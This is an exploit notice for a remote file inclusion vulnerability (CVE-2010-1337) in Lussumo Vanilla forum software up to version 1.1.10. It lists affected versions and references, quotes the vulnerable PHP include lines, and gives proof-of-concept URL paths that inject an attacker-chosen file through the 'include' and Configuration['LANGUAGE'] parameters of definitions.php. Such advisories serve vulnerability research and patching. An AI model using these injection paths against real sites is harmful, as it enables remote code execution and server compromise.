######################################################## Title: Vanilla-1.1.10 <= Remote File Inclusion Vulnerability Version: 1.1.10 link: http://php.opensourcecms.com/scripts/redirect/website.php?id=128 License: - CVE-ID: CVE-2010-1337 OSVDB-ID: 63654 Vulnerable: Lussumo Vanilla 1.1.10 Lussumo Vanilla 1.1.9 Lussumo Vanilla 1.1.8 Lussumo Vanilla 1.1.7 Lussumo Vanilla 1.1.5 Lussumo Vanilla 1.1.4 Lussumo Vanilla 1.1.3 Lussumo Vanilla 1.0.1 Lussumo Vanilla 1.1.5 RC1 Lussumo Vanilla 1.0 References: http://www.packetstormsecurity.com/1003-exploits/vanilla-rfi.txt http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1337 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1337 http://osvdb.org/show/osvdb/63654 http://www.securityfocus.com/bid/38889 http://xforce.iss.net/xforce/xfdb/57147 ######################################################## Author: eidelweiss Contact: eidelweiss[at]cyberservices.com Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert) AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u) ######################################################## -=[ VULN ]=- [-] include($Configuration['LANGUAGES_PATH'].$Configuration['LANGUAGE'].'/definitions.php'); [-] include($Configuration['APPLICATION_PATH'].'conf/language.php'); -=[ P0C ]=- [+] PATH/languages/yourlanguage/definitions.php?include= [inj3ct0r] [+] PATH/languages/yourlanguage/definitions.php?Configuration['LANGUAGE']= [inj3ct0r] ################################################################ [ FIX ] Use Your Skill and Play Your Imagination ################################################################